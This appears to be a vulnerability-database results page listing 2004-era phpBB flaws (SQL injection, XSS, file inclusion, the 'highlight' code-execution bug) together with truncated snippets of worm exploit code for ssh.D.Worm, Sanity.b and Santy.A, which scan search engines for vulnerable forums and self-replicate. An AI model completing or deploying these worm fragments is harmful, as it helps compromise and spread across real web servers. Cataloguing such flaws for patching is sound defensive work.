2180 matches found
CVE-2004-1399
Directory traversal vulnerability in the Attachment module 2.3.10 and earlier for phpBB allows remote attackers to read arbitrary files via a .. dot dot in the filename...
List of all admin accounts in phpBB
After discovering 'highlight' vulnerability in phpBB, many forums were patched, but... it is possible that attackers created a secret admin accounts... It is very hard to find secret admin accounts if the forum has too many users... you must check every account... So, here is a simple PHP script,...
phpBB < 2.0.11 Multiple Vulnerabilities (ESMARKCONANT)
The remote host is running a version of phpBB older than 2.0.11. It is reported that this version of phpBB is susceptible to a script injection vulnerability which may allow an attacker to execute arbitrary code on the remote host. In addition, phpBB has been reported to multiple SQL injections,...
phpBB 2.0.10 - ssh.D.Worm Bot Install Altavista
phpBB 2.0.10 - ssh.D.Worm Bot Install Altavista !/usr/bin/perl ------------------------------------------------------------------------ Severino Honorato - /server irc.priv8crew.info Priv8crew - ssh.D.Worm use IO::Socket; use LWP::Simple; my $processo = "/usr/local/apache/bin/httpd -DSSL";...
phpBB 2.0.10 - 'ssh.D.Worm' Bot Install Altavista
!/usr/bin/perl ------------------------------------------------------------------------ Severino Honorato - /server irc.priv8crew.info Priv8crew - ssh.D.Worm use IO::Socket; use LWP::Simple; my $processo = "/usr/local/apache/bin/httpd -DSSL"; $SIG"INT" = "IGNORE"; $SIG"HUP" = "IGNORE"; $SIG"TERM"...
phpBB <= 2.0.10 Bot Install (Altavista) (ssh.D.Worm)
No description provided by source. !/usr/bin/perl ------------------------------------------------------------------------ Severino Honorato - /server irc.priv8crew.info Priv8crew - ssh.D.Worm use IO::Socket; use LWP::Simple; my $processo = "/usr/local/apache/bin/httpd -DSSL"; $SIG"INT" = "IGNORE...
phpBB <= 2.0.10 Bot Install (Altavista) (ssh.D.Worm)
Exploit for unknown platform in category web applications ==================================================== phpBB / $ae= s//$1/; $uber=$1; $uber = s/ //g; $uber = s///g; $uber = s///g; $uber = s/wb...
CVE-2004-2350
SQL injection vulnerability in search.php for phpBB 1.0 through 2.0.6 allows remote attackers to execute arbitrary SQL and gain privileges via the searchresults parameter...
CVE-2004-2358
Cross-site scripting XSS vulnerability in adminwords.php for phpBB 2.0.6c allows remote attackers to inject arbitrary web script or HTML via the id parameter...
CVE-2004-1399
Directory traversal vulnerability in the Attachment module 2.3.10 and earlier for phpBB allows remote attackers to read arbitrary files via a .. dot dot in the filename...
CVE-2004-1404
Attachment Mod 2.3.10 module for phpBB, when used with Apache modmime, does not properly handle files with multiple file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code...
CVE-2004-1535
PHP remote file inclusion vulnerability in admincash.php for the Cash Mod module for phpBB allows remote attackers to execute arbitrary PHP code by modifying the phpbbrootpath parameter to reference a URL on a remote web server that contains the code...
CVE-2004-1315
viewtopic.php in phpBB 2.x before 2.0.11 improperly URL decodes the highlight parameter when extracting words and phrases to highlight, which allows remote attackers to execute arbitrary PHP code by double-encoding the highlight value so that special characters are inserted into the result, which...
CVE-2004-1315
Summary: CVE-2004-1315 affects phpBB 2.x prior to 2.0.11. The vulnerability stems from improper URL decoding of the highlight parameter in viewtopic.php, allowing a remote attacker to double-encode the highlight value so that PHP exec runs arbitrary code. Exploited in the wild by the Santy.A worm...
CVE-2004-2054
CRLF injection vulnerability in PhpBB 2.0.4 and 2.0.9 allows remote attackers to perform HTTP Response Splitting attacks to modify expected HTML content from the server via 1 the mode parameter to privmsg.php or 2 the redirect parameter to login.php...
CVE-2004-1809
Cross-site scripting XSS vulnerability in phpBB 2.0.6d and earlier allows remote attackers to inject arbitrary web script or HTML via the 1 postdays parameter to viewtopic.php or 2 topicdays parameter to viewforum.php...
Sanity.b - phpBB <= 2.0.10 Bot Install (AOL/Yahoo Search)
No description provided by source. /usr/bin/perl use IO::Socket; use LWP::Simple; @vul = ""; $a=0; $numero = int rand999; $site = "search.aol.com"; $procura = "viewtopic.php%3Ft%3D$numero"; for$n=0;$n90;$n += 10 $sock = IO::Socket::INET-newPeerAddr="$site",PeerPort="80",Proto="tcp" or next; print...
Sanity.b - phpBB <= 2.0.10 Bot Install (AOL/Yahoo Search)
Exploit for unknown platform in category web applications ========================================================= Sanity.b - phpBB newPeerAddr="$site",PeerPort="80",Proto="tcp" or next; print $sock "GET /aolcom/search?q=$procura&Stage=0&page=$n HTTP/1.0\n\n"; @resu = ; close$sock; $ae = "@resu"...
CVE-2004-2130
Multiple cross-site scripting XSS vulnerabilities in privmsg.php in phpBB 2.0.6 allow remote attackers to execute arbitrary script or HTML via the 1 folder or 2 mode variables...
phpBB < 2.0.10 - 'Santy.A Worm' 'highlight' Arbitrary File Upload
Santy.A - phpBB 3; open IN, $0 or exit; my $self = join '', ; close IN; unlink $0; while!GrabURL'http://www.google.com/advancedsearch' if$generation 3 PayLoad ; else exit; $self = s/my $generation = \d+;/'my $generation = ' . $1 + 1 . ';'/e; my $selfFileName = 'm1ho2of'; my $markStr =...